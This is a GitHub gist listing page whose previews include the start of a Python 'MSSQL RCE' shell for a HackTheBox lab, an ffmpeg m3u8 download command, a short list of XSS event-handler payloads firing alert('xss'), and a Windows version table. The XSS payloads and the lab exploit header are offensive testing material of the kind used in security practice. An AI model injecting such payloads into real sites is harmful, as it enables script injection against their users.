Skip to content

Instantly share code, notes, and snippets.

View 0x20c's full-sized avatar
🏠
Working from home

Ayu 0x20c

🏠
Working from home
  • None
  • ^O^
View GitHub Profile
@0x20c
0x20c / shell.py
Created June 21, 2021 14:04
[HackTheBox - Fighter] MSSQL RCE
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import requests
from base64 import b64decode
from urllib.parse import unquote
class MSShell(object):
def __init__(self, burp="http://127.0.0.1:8080"):
@0x20c
0x20c / shell.sh
Created January 18, 2021 04:05
[m3u8 download for ffmpeg]
# If use Proxy
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
# download
ffmpeg -i https://PATH.m3u8 -acodec copy -vcodec copy -f mp4 output.mp4
@0x20c
0x20c / Attribute.html
Last active July 20, 2024 11:28
[Xss 触发标签及属性]
<!-- onerror -->
<img src=1 onerror=alert("xss")/>
<!-- onfocus -->
<input onfocus="alert('xss')"/>
<!-- onload -->
<svg onload=alert("xss")/>
<!-- onmouseover -->
@0x20c
0x20c / Windows_Version_Build_id.md
Created December 10, 2020 12:54
[Windows Version - Build]
Name	                            Version	    Build	Release Date	RTM Date
Windows 95	                        4.00        950	    1995-08-24	
Windows 95 OEM Service Release 1    4.00        950 A	1996-02-14	
Windows 95 OEM Service Release 2    4.00        950 B	1996-08-24	
Windows 95 OEM Service Release 2.1  4.00        950 B	1997-08-27	
Windows 95 OEM Service Release 2.5  4.00        950 C	1997-11-26	
Windows 98                          4.10        1998	1998-05-15	
Windows 98 Second Edition (SE)      4.10        2222	1999-05-05